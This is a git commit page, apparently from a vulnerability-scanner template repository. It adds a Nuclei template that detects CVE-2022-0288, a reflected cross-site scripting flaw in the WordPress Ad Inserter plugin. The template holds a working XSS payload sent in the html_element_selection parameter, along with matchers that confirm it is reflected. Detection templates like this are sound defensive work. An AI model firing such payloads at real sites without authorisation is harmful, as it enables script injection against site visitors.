Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting (#4291)
* Create CVE-2022-0288.yaml * misc updates Co-authored-by: sandeep <sandeep@projectdiscovery.io>patch-1
parent
e3bf8723e5
commit
6b4724f5b1
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-0288
|
||||
|
||||
info:
|
||||
name: Ad Inserter < 2.7.10 - Reflected Cross-Site Scripting
|
||||
author: DhiyaneshDK
|
||||
severity: medium
|
||||
description: The plugins do not sanitise and escape the html_element_selection parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
|
||||
remediation: Fixed in version 2.7.12
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
|
||||
tags: cve,cve2022,wordpress,xss
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
headers:
|
||||
Content-Type: "application/x-www-form-urlencoded"
|
||||
|
||||
body: |
|
||||
html_element_selection=</script><img+src+onerror=alert(document.domain)>
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><img src onerror=alert(document.domain)>"
|
||||
- "ad-inserter"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
Loading…
Reference in New Issue